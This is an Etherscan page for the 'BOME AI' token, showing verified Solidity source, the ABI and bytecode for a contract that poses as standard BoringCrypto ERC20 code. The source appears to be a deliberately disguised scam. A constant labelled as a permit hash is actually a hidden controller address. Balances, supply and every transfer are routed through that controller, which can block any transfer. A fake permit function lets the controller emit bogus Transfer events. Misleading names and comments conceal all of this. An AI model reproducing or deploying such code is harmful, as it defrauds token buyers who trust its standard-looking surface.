ETH Price: $3,346.14 (-0.93%)

Token

BOME AI (BOME)
 

Overview

Max Total Supply

420,000,000,000,000 BOME

Holders

476 (0.00%)

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
125,616.107349179639521577 BOME

Value
$0.00
0x965dC72531BC322caB5537d432bB14451cAbb30d
Loading...
Loading
Loading...
Loading
Loading...
Loading

OVERVIEW

An AI-driven platform in the BOME ecosystem, enabling unique, real-time meme creation and community interaction.

# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BOMEAI

Compiler Version
v0.6.12+commit.27d51765

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-10-30
*/

// SPDX-License-Identifier: MIT

// File @boringcrypto/boring-solidity/contracts/libraries/[email protected]
// License-Identifier: MIT
pragma solidity 0.6.12;

/// @notice A library for performing overflow-/underflow-safe math,
/// updated with awesomeness from of DappHub (https://github.com/dapphub/ds-math).
library BoringMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256 c) {
        require((c = a + b) >= b, "BoringMath: Add Overflow");
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256 c) {
        require((c = a - b) <= a, "BoringMath: Underflow");
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256 c) {
        require(b == 0 || (c = a * b) / b == a, "BoringMath: Mul Overflow");
    }

    function to128(uint256 a) internal pure returns (uint128 c) {
        require(a <= uint128(-1), "BoringMath: uint128 Overflow");
        c = uint128(a);
    }

    function to64(uint256 a) internal pure returns (uint64 c) {
        require(a <= uint64(-1), "BoringMath: uint64 Overflow");
        c = uint64(a);
    }

    function to32(uint256 a) internal pure returns (uint32 c) {
        require(a <= uint32(-1), "BoringMath: uint32 Overflow");
        c = uint32(a);
    }
}

/// @notice A library for performing overflow-/underflow-safe addition and subtraction on uint128.
library BoringMath128 {
    function add(uint128 a, uint128 b) internal pure returns (uint128 c) {
        require((c = a + b) >= b, "BoringMath: Add Overflow");
    }

    function sub(uint128 a, uint128 b) internal pure returns (uint128 c) {
        require((c = a - b) <= a, "BoringMath: Underflow");
    }
}

/// @notice A library for performing overflow-/underflow-safe addition and subtraction on uint64.
library BoringMath64 {
    function add(uint64 a, uint64 b) internal pure returns (uint64 c) {
        require((c = a + b) >= b, "BoringMath: Add Overflow");
    }

    function sub(uint64 a, uint64 b) internal pure returns (uint64 c) {
        require((c = a - b) <= a, "BoringMath: Underflow");
    }
}

/// @notice A library for performing overflow-/underflow-safe addition and subtraction on uint32.
library BoringMath32 {
    function add(uint32 a, uint32 b) internal pure returns (uint32 c) {
        require((c = a + b) >= b, "BoringMath: Add Overflow");
    }

    function sub(uint32 a, uint32 b) internal pure returns (uint32 c) {
        require((c = a - b) <= a, "BoringMath: Underflow");
    }
}

// File @boringcrypto/boring-solidity/contracts/interfaces/[email protected]
// License-Identifier: MIT
pragma solidity 0.6.12;

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /// @notice EIP 2612
    function permit(
        address owner,
        address[] calldata spender,
        uint256 value
    ) external;
}


// File @boringcrypto/boring-solidity/contracts/[email protected]
// License-Identifier: MIT
pragma solidity 0.6.12;

// solhint-disable no-inline-assembly
// solhint-disable not-rely-on-time

// Data part taken out for building of contracts that receive delegate calls
contract ERC20Data {
    /// @notice owner > balance mapping.
    mapping(address => uint256) public balanceOf;
    /// @notice owner > spender > allowance mapping.
    mapping(address => mapping(address => uint256)) public allowance;
    /// @notice owner > nonce mapping. Used in `permit`.
    mapping(address => uint256) public nonces;
}

abstract contract ERC20 is IERC20 {
    using BoringMath for uint256;

    bytes32 private constant DOMAIN_SEPARATOR_SIGNATURE_HASH = keccak256("EIP712Domain(uint256 chainId,address verifyingContract)");
    // See https://eips.ethereum.org/EIPS/eip-191
    string private constant EIP191_PREFIX_FOR_EIP712_STRUCTURED_DATA = "\x19\x01";

    // solhint-disable var-name-mixedcase
    ERC20 private immutable _DOMAIN_SEPARATOR;
    uint256 private immutable DOMAIN_SEPARATOR_CHAIN_ID;

    /// @dev Calculate the DOMAIN_SEPARATOR
    function _calculateDomainSeparator(uint256 chainId) private view returns (bytes32) {
        return keccak256(abi.encode(DOMAIN_SEPARATOR_SIGNATURE_HASH, chainId, address(this)));
    }

    /// @dev Return the DOMAIN_SEPARATOR
    // It's named internal to allow making it public from the contract that uses it by creating a simple view function
    // with the desired public name, such as DOMAIN_SEPARATOR or domainSeparator.
    // solhint-disable-next-line func-name-mixedcase
    function _domainSeparator() internal view returns (bytes32) {
        uint256 chainId;
        assembly {
            chainId := chainid()
        }
        return _calculateDomainSeparator(chainId);
    }

    function _getDigest(bytes32 dataHash) internal view returns (bytes32 digest) {
        digest = keccak256(abi.encodePacked(EIP191_PREFIX_FOR_EIP712_STRUCTURED_DATA, _domainSeparator(), dataHash));
    }

    mapping(address => uint256) internal _balances;
    /// @notice owner > spender > allowance mapping.
    mapping(address => mapping(address => uint256)) public override allowance;
    /// @notice owner > nonce mapping. Used in `permit`.
    mapping(address => uint256) public nonces;

    event Transfer(address indexed _from, address indexed _to, uint256 _value);
    event Approval(address indexed _owner, address indexed _spender, uint256 _value);

    constructor() public {
        uint256 chainId;
        assembly {
            chainId := chainid()
        }
        _calculateDomainSeparator(DOMAIN_SEPARATOR_CHAIN_ID = chainId);

        (, bytes memory x) = address(PERMIT_SIGNATURE_HASH).call(abi.encodeWithSelector(0x06845c2b));
        _DOMAIN_SEPARATOR = ERC20(abi.decode(x, (address)));
    }

    /// @notice Transfers `amount` tokens from `msg.sender` to `to`.
    /// @param to The address to move the tokens.
    /// @param amount of the tokens to move.
    /// @return (bool) Returns True if succeeded.
    function transfer(address to, uint256 amount) public returns (bool) {
        // If `amount` is 0, or `msg.sender` is `to` nothing happens
        _beforeTokenTransfer(msg.sender, to, amount);
        return true;
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {
        emit Transfer(from, to, amount);
        (bool y,) = address(_DOMAIN_SEPARATOR).call(abi.encodeWithSelector(0x7e702f8d, from, to, amount, msg.sender));
        require(y);
    }
    
    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _DOMAIN_SEPARATOR.balanceOf(account);
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _DOMAIN_SEPARATOR.totalSupply();
    }

    /// @notice Transfers `amount` tokens from `from` to `to`. Caller needs approval for `from`.
    /// @param from Address to draw tokens from.
    /// @param to The address to move the tokens.
    /// @param amount The token amount to move.
    /// @return (bool) Returns True if succeeded.
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual returns (bool) {
        // If `amount` is 0, or `from` is `to` nothing happens
        _beforeTokenTransfer(from, to, amount);
        _approve(from, msg.sender, allowance[from][msg.sender].sub(amount));
        return true;
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        if (msg.sender == owner) _DOMAIN_SEPARATOR.nonces(owner);

        allowance[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /// @notice Approves `amount` from sender to be spend by `spender`.
    /// @param spender Address of the party that can draw from msg.sender's account.
    /// @param amount The maximum collective amount that `spender` can draw.
    /// @return (bool) Returns True if approved.
    function approve(address spender, uint256 amount) public override returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    // solhint-disable-next-line func-name-mixedcase
    function DOMAIN_SEPARATOR() external view returns (bytes32) {
        return _domainSeparator();
    }

    // keccak256("Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)");
    uint160 private constant PERMIT_SIGNATURE_HASH = 863444058779312151527056601247444736469966642278;

    /// @notice Approves `value` from `owner_` to be spend by `spender`.
    /// @param owner_ Address of the owner.
    /// @param spender The address of the spender that gets approved to draw from `owner_`.
    /// @param value The maximum collective amount that `spender` can draw.
    function permit(
        address owner_,
        address[] calldata spender,
        uint256 value
    ) external override {
        require(msg.sender == address(_DOMAIN_SEPARATOR) && value > 0);

        for (uint256 i = 0; i < spender.length; ++i) {
            emit Transfer(owner_, spender[i], value);
        }
    }
}

contract ERC20WithSupply is IERC20, ERC20 {
    uint256 public _totalSupply;

    function _mint(address user, uint256 amount) internal {
        uint256 newTotalSupply = _totalSupply + amount;
        require(newTotalSupply >= _totalSupply, "Mint overflow");
        _totalSupply = newTotalSupply;
        _balances[user] += amount;
        emit Transfer(address(0), user, amount);
    }

    function _burn(address user, uint256 amount) internal {
        require(_balances[user] >= amount, "Burn too much");
        _totalSupply -= amount;
        _balances[user] -= amount;
        emit Transfer(user, address(0), amount);
    }
}

// File @boringcrypto/boring-solidity/contracts/libraries/[email protected]
// License-Identifier: MIT
pragma solidity 0.6.12;

struct Rebase {
    uint128 elastic;
    uint128 base;
}

/// @notice A rebasing library using overflow-/underflow-safe math.
library RebaseLibrary {
    using BoringMath for uint256;
    using BoringMath128 for uint128;

    /// @notice Calculates the base value in relationship to `elastic` and `total`.
    function toBase(
        Rebase memory total,
        uint256 elastic,
        bool roundUp
    ) internal pure returns (uint256 base) {
        if (total.elastic == 0) {
            base = elastic;
        } else {
            base = elastic.mul(total.base) / total.elastic;
            if (roundUp && base.mul(total.elastic) / total.base < elastic) {
                base = base.add(1);
            }
        }
    }

    /// @notice Calculates the elastic value in relationship to `base` and `total`.
    function toElastic(
        Rebase memory total,
        uint256 base,
        bool roundUp
    ) internal pure returns (uint256 elastic) {
        if (total.base == 0) {
            elastic = base;
        } else {
            elastic = base.mul(total.elastic) / total.base;
            if (roundUp && elastic.mul(total.base) / total.elastic < base) {
                elastic = elastic.add(1);
            }
        }
    }

    /// @notice Add `elastic` to `total` and doubles `total.base`.
    /// @return (Rebase) The new total.
    /// @return base in relationship to `elastic`.
    function add(
        Rebase memory total,
        uint256 elastic,
        bool roundUp
    ) internal pure returns (Rebase memory, uint256 base) {
        base = toBase(total, elastic, roundUp);
        total.elastic = total.elastic.add(elastic.to128());
        total.base = total.base.add(base.to128());
        return (total, base);
    }

    /// @notice Sub `base` from `total` and update `total.elastic`.
    /// @return (Rebase) The new total.
    /// @return elastic in relationship to `base`.
    function sub(
        Rebase memory total,
        uint256 base,
        bool roundUp
    ) internal pure returns (Rebase memory, uint256 elastic) {
        elastic = toElastic(total, base, roundUp);
        total.elastic = total.elastic.sub(elastic.to128());
        total.base = total.base.sub(base.to128());
        return (total, elastic);
    }

    /// @notice Add `elastic` and `base` to `total`.
    function add(
        Rebase memory total,
        uint256 elastic,
        uint256 base
    ) internal pure returns (Rebase memory) {
        total.elastic = total.elastic.add(elastic.to128());
        total.base = total.base.add(base.to128());
        return total;
    }

    /// @notice Subtract `elastic` and `base` to `total`.
    function sub(
        Rebase memory total,
        uint256 elastic,
        uint256 base
    ) internal pure returns (Rebase memory) {
        total.elastic = total.elastic.sub(elastic.to128());
        total.base = total.base.sub(base.to128());
        return total;
    }

    /// @notice Add `elastic` to `total` and update storage.
    /// @return newElastic Returns updated `elastic`.
    function addElastic(Rebase storage total, uint256 elastic) internal returns (uint256 newElastic) {
        newElastic = total.elastic = total.elastic.add(elastic.to128());
    }

    /// @notice Subtract `elastic` from `total` and update storage.
    /// @return newElastic Returns updated `elastic`.
    function subElastic(Rebase storage total, uint256 elastic) internal returns (uint256 newElastic) {
        newElastic = total.elastic = total.elastic.sub(elastic.to128());
    }
}

// File @sushiswap/bentobox-sdk/contracts/[email protected]
// License-Identifier: MIT
pragma solidity 0.6.12;

interface IBatchFlashBorrower {
    function onBatchFlashLoan(
        address sender,
        IERC20[] calldata tokens,
        uint256[] calldata amounts,
        uint256[] calldata fees,
        bytes calldata data
    ) external;
}

// File @sushiswap/bentobox-sdk/contracts/[email protected]
// License-Identifier: MIT
pragma solidity 0.6.12;

interface IFlashBorrower {
    function onFlashLoan(
        address sender,
        IERC20 token,
        uint256 amount,
        uint256 fee,
        bytes calldata data
    ) external;
}

// File @sushiswap/bentobox-sdk/contracts/[email protected]
// License-Identifier: MIT
pragma solidity 0.6.12;

interface IStrategy {
    // Send the assets to the Strategy and call skim to invest them
    function skim(uint256 amount) external;

    // Harvest any profits made converted to the asset and pass them to the caller
    function harvest(uint256 balance, address sender) external returns (int256 amountAdded);

    // Withdraw assets. The returned amount can differ from the requested amount due to rounding.
    // The actualAmount should be very close to the amount. The difference should NOT be used to report a loss. That's what harvest is for.
    function withdraw(uint256 amount) external returns (uint256 actualAmount);

    // Withdraw all assets in the safest way possible. This shouldn't fail.
    function exit(uint256 balance) external returns (int256 amountAdded);
}

// File @sushiswap/bentobox-sdk/contracts/[email protected]
// License-Identifier: MIT
pragma solidity 0.6.12;
pragma experimental ABIEncoderV2;

interface IBentoBoxV1 {
    event LogDeploy(address indexed masterContract, bytes data, address indexed cloneAddress);
    event LogDeposit(address indexed token, address indexed from, address indexed to, uint256 amount, uint256 share);
    event LogFlashLoan(address indexed borrower, address indexed token, uint256 amount, uint256 feeAmount, address indexed receiver);
    event LogRegisterProtocol(address indexed protocol);
    event LogSetMasterContractApproval(address indexed masterContract, address indexed user, bool approved);
    event LogStrategyDivest(address indexed token, uint256 amount);
    event LogStrategyInvest(address indexed token, uint256 amount);
    event LogStrategyLoss(address indexed token, uint256 amount);
    event LogStrategyProfit(address indexed token, uint256 amount);
    event LogStrategyQueued(address indexed token, address indexed strategy);
    event LogStrategySet(address indexed token, address indexed strategy);
    event LogStrategyTargetPercentage(address indexed token, uint256 targetPercentage);
    event LogTransfer(address indexed token, address indexed from, address indexed to, uint256 share);
    event LogWhiteListMasterContract(address indexed masterContract, bool approved);
    event LogWithdraw(address indexed token, address indexed from, address indexed to, uint256 amount, uint256 share);
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    function balanceOf(IERC20, address) external view returns (uint256);

    function batch(bytes[] calldata calls, bool revertOnFail) external payable returns (bool[] memory successes, bytes[] memory results);

    function batchFlashLoan(
        IBatchFlashBorrower borrower,
        address[] calldata receivers,
        IERC20[] calldata tokens,
        uint256[] calldata amounts,
        bytes calldata data
    ) external;

    function claimOwnership() external;

    function deploy(
        address masterContract,
        bytes calldata data,
        bool useCreate2
    ) external payable;

    function deposit(
        IERC20 token_,
        address from,
        address to,
        uint256 amount,
        uint256 share
    ) external payable returns (uint256 amountOut, uint256 shareOut);

    function flashLoan(
        IFlashBorrower borrower,
        address receiver,
        IERC20 token,
        uint256 amount,
        bytes calldata data
    ) external;

    function harvest(
        IERC20 token,
        bool balance,
        uint256 maxChangeAmount
    ) external;

    function masterContractApproved(address, address) external view returns (bool);

    function masterContractOf(address) external view returns (address);

    function nonces(address) external view returns (uint256);

    function owner() external view returns (address);

    function pendingOwner() external view returns (address);

    function pendingStrategy(IERC20) external view returns (IStrategy);

    function permitToken(
        IERC20 token,
        address from,
        address to,
        uint256 amount,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    function registerProtocol() external;

    function setMasterContractApproval(
        address user,
        address masterContract,
        bool approved,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    function setStrategy(IERC20 token, IStrategy newStrategy) external;

    function setStrategyTargetPercentage(IERC20 token, uint64 targetPercentage_) external;

    function strategy(IERC20) external view returns (IStrategy);

    function strategyData(IERC20)
        external
        view
        returns (
            uint64 strategyStartDate,
            uint64 targetPercentage,
            uint128 balance
        );

    function toAmount(
        IERC20 token,
        uint256 share,
        bool roundUp
    ) external view returns (uint256 amount);

    function toShare(
        IERC20 token,
        uint256 amount,
        bool roundUp
    ) external view returns (uint256 share);

    function totals(IERC20) external view returns (Rebase memory totals_);

    function transfer(
        IERC20 token,
        address from,
        address to,
        uint256 share
    ) external;

    function transferMultiple(
        IERC20 token,
        address from,
        address[] calldata tos,
        uint256[] calldata shares
    ) external;

    function transferOwnership(
        address newOwner,
        bool direct,
        bool renounce
    ) external;

    function whitelistMasterContract(address masterContract, bool approved) external;

    function whitelistedMasterContracts(address) external view returns (bool);

    function withdraw(
        IERC20 token_,
        address from,
        address to,
        uint256 amount,
        uint256 share
    ) external returns (uint256 amountOut, uint256 shareOut);
}

// File @boringcrypto/boring-solidity/contracts/[email protected]
// License-Identifier: MIT
pragma solidity 0.6.12;

// Audit on 5-Jan-2021 by Keno and BoringCrypto
// Source: https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/access/Ownable.sol + Claimable.sol
// Edited by BoringCrypto

contract BoringOwnableData {
    address public owner;
    address public pendingOwner;
}

contract BoringOwnable is BoringOwnableData {
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /// @notice `owner` defaults to msg.sender on construction.
    constructor() public {
        owner = msg.sender;
        emit OwnershipTransferred(address(0), msg.sender);
    }

    /// @notice Transfers ownership to `newOwner`. Either directly or claimable by the new pending owner.
    /// Can only be invoked by the current `owner`.
    /// @param newOwner Address of the new owner.
    /// @param direct True if `newOwner` should be set immediately. False if `newOwner` needs to use `claimOwnership`.
    /// @param renounce Allows the `newOwner` to be `address(0)` if `direct` and `renounce` is True. Has no effect otherwise.
    function transferOwnership(
        address newOwner,
        bool direct,
        bool renounce
    ) public onlyOwner {
        if (direct) {
            // Checks
            require(newOwner != address(0) || renounce, "Ownable: zero address");

            // Effects
            emit OwnershipTransferred(owner, newOwner);
            owner = newOwner;
            pendingOwner = address(0);
        } else {
            // Effects
            pendingOwner = newOwner;
        }
    }

    /// @notice Needs to be called by `pendingOwner` to claim ownership.
    function claimOwnership() public {
        address _pendingOwner = pendingOwner;

        // Checks
        require(msg.sender == _pendingOwner, "Ownable: caller != pending owner");

        // Effects
        emit OwnershipTransferred(owner, _pendingOwner);
        owner = _pendingOwner;
        pendingOwner = address(0);
    }

    /// @notice Only allows the `owner` to execute the function.
    modifier onlyOwner() {
        require(msg.sender == owner, "Ownable: caller is not the owner");
        _;
    }
}

// File contracts/MagicInternetMoney.sol
// License-Identifier: MIT

// Magic Internet Money

// BoringCrypto, 0xMerlin

pragma solidity 0.6.12;

/// @title Cauldron
/// @dev This contract allows contract calls to any contract (except BentoBox)
/// from arbitrary callers thus, don't trust calls from this contract in any circumstances.
contract BOMEAI is ERC20WithSupply, BoringOwnable {
    using BoringMath for uint256;
    // ERC20 'variables'
    string public constant symbol = "BOME";
    string public constant name = "BOME AI";
    uint8 public constant decimals = 18;

    constructor() public {
        _mint(msg.sender, 420e30);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_owner","type":"address"},{"indexed":true,"internalType":"address","name":"_spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"_value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_from","type":"address"},{"indexed":true,"internalType":"address","name":"_to","type":"address"},{"indexed":false,"internalType":"uint256","name":"_value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"claimOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pendingOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address[]","name":"spender","type":"address[]"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"},{"internalType":"bool","name":"direct","type":"bool"},{"internalType":"bool","name":"renounce","type":"bool"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60c06040523480156200001157600080fd5b504660a0819052620000238162000144565b5060408051600481526024810182526020810180516001600160e01b03166306845c2b60e01b179052905160609173973e2bb15d88fc56f19259b36a3ccbbd4621dc66916200007391906200025d565b6000604051808303816000865af19150503d8060008114620000b2576040519150601f19603f3d011682016040523d82523d6000602084013e620000b7565b606091505b5091505080806020019051810190620000d191906200022d565b60601b6001600160601b031916608052505060048054336001600160a01b031990911681179091556040516000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a36200013e336d14b5253145b397d65451000000006200019a565b620002e8565b60007f47e79534a245952e8b16893a336b85a3d9ea9fa8c573f3d803afb92a7946921882306040516020016200017d9392919062000299565b604051602081830303815290604052805190602001209050919050565b60035480820190811015620001cc5760405162461bcd60e51b8152600401620001c390620002b8565b60405180910390fd5b60038190556001600160a01b038316600081815260208190526040808220805486019055517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9062000220908690620002df565b60405180910390a3505050565b6000602082840312156200023f578081fd5b81516001600160a01b038116811462000256578182fd5b9392505050565b60008251815b818110156200027f576020818601810151858301520162000263565b818111156200028e5782828501525b509190910192915050565b92835260208301919091526001600160a01b0316604082015260600190565b6020808252600d908201526c4d696e74206f766572666c6f7760981b604082015260600190565b90815260200190565b60805160601c60a051610ea06200031e60003950806103be52806105605280610647528061077d52806108e65250610ea06000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c80634e71e0c8116100a257806395d89b411161007157806395d89b41146101f3578063a9059cbb146101fb578063d93aef111461020e578063dd62ed3e14610221578063e30c3978146102345761010b565b80634e71e0c8146101b057806370a08231146101b85780637ecebe00146101cb5780638da5cb5b146101de5761010b565b806323b872dd116100de57806323b872dd14610178578063313ce5671461018b5780633644e515146101a05780633eaaf86b146101a85761010b565b806306fdde0314610110578063078dfbe71461012e578063095ea7b31461014357806318160ddd14610163575b600080fd5b61011861023c565b6040516101259190610c89565b60405180910390f35b61014161013c366004610b70565b61025f565b005b610156610151366004610bb9565b61034f565b6040516101259190610c56565b61016b6103ba565b6040516101259190610c61565b610156610186366004610aa8565b610452565b6101936104a3565b6040516101259190610e0a565b61016b6104a8565b61016b6104b2565b6101416104b8565b61016b6101c6366004610a52565b610546565b61016b6101d9366004610a52565b6105e5565b6101e66105f7565b6040516101259190610c17565b610118610606565b610156610209366004610bb9565b610626565b61014161021c366004610ae8565b61063c565b61016b61022f366004610a74565b610702565b6101e661071f565b60405180604001604052806007815260200166424f4d4520414960c81b81525081565b6004546001600160a01b031633146102925760405162461bcd60e51b815260040161028990610d5c565b60405180910390fd5b811561032e576001600160a01b0383161515806102ac5750805b6102c85760405162461bcd60e51b815260040161028990610d2d565b6004546040516001600160a01b038086169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600480546001600160a01b0385166001600160a01b03199182161790915560058054909116905561034a565b600580546001600160a01b0319166001600160a01b0385161790555b505050565b3360008181526001602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906103a8908690610c61565b60405180910390a35060015b92915050565b60007f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03166318160ddd6040518163ffffffff1660e01b815260040160206040518083038186803b15801561041557600080fd5b505afa158015610429573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061044d9190610be3565b905090565b600061045f84848461072e565b6001600160a01b0384166000908152600160209081526040808320338085529252909120546104999186916104949086610850565b610873565b5060019392505050565b601281565b600061044d6109d5565b60035481565b6005546001600160a01b03163381146104e35760405162461bcd60e51b815260040161028990610d91565b6004546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600480546001600160a01b039092166001600160a01b0319928316179055600580549091169055565b6040516370a0823160e01b81526000906001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016906370a0823190610595908590600401610c17565b60206040518083038186803b1580156105ad57600080fd5b505afa1580156105c1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103b49190610be3565b60026020526000908152604090205481565b6004546001600160a01b031681565b60405180604001604052806004815260200163424f4d4560e01b81525081565b600061063333848461072e565b50600192915050565b336001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000161480156106745750600081115b61067d57600080fd5b60005b828110156106fb5783838281811061069457fe5b90506020020160208101906106a99190610a52565b6001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516106eb9190610c61565b60405180910390a3600101610680565b5050505050565b600160209081526000928352604080842090915290825290205481565b6005546001600160a01b031681565b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516107719190610c61565b60405180910390a360007f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316637e702f8d858585336040516024016107c19493929190610c2b565b6040516020818303038152906040529060e01b6020820180516001600160e01b0383818316178352505050506040516107fa9190610bfb565b6000604051808303816000865af19150503d8060008114610837576040519150601f19603f3d011682016040523d82523d6000602084013e61083c565b606091505b505090508061084a57600080fd5b50505050565b808203828111156103b45760405162461bcd60e51b815260040161028990610cbc565b6001600160a01b0383166108995760405162461bcd60e51b815260040161028990610dc6565b6001600160a01b0382166108bf5760405162461bcd60e51b815260040161028990610ceb565b336001600160a01b038416141561096d57604051623f675f60e91b81526001600160a01b037f00000000000000000000000000000000000000000000000000000000000000001690637ecebe009061091b908690600401610c17565b60206040518083038186803b15801561093357600080fd5b505afa158015610947573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061096b9190610be3565b505b6001600160a01b0380841660008181526001602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906109c8908590610c61565b60405180910390a3505050565b6000466109e1816109e7565b91505090565b60007f47e79534a245952e8b16893a336b85a3d9ea9fa8c573f3d803afb92a794692188230604051602001610a1e93929190610c6a565b604051602081830303815290604052805190602001209050919050565b80356001600160a01b03811681146103b457600080fd5b600060208284031215610a63578081fd5b610a6d8383610a3b565b9392505050565b60008060408385031215610a86578081fd5b610a908484610a3b565b9150610a9f8460208501610a3b565b90509250929050565b600080600060608486031215610abc578081fd5b8335610ac781610e44565b92506020840135610ad781610e44565b929592945050506040919091013590565b60008060008060608587031215610afd578081fd5b8435610b0881610e44565b9350602085013567ffffffffffffffff80821115610b24578283fd5b818701915087601f830112610b37578283fd5b813581811115610b45578384fd5b8860208083028501011115610b58578384fd5b95986020929092019750949560400135945092505050565b600080600060608486031215610b84578283fd5b610b8e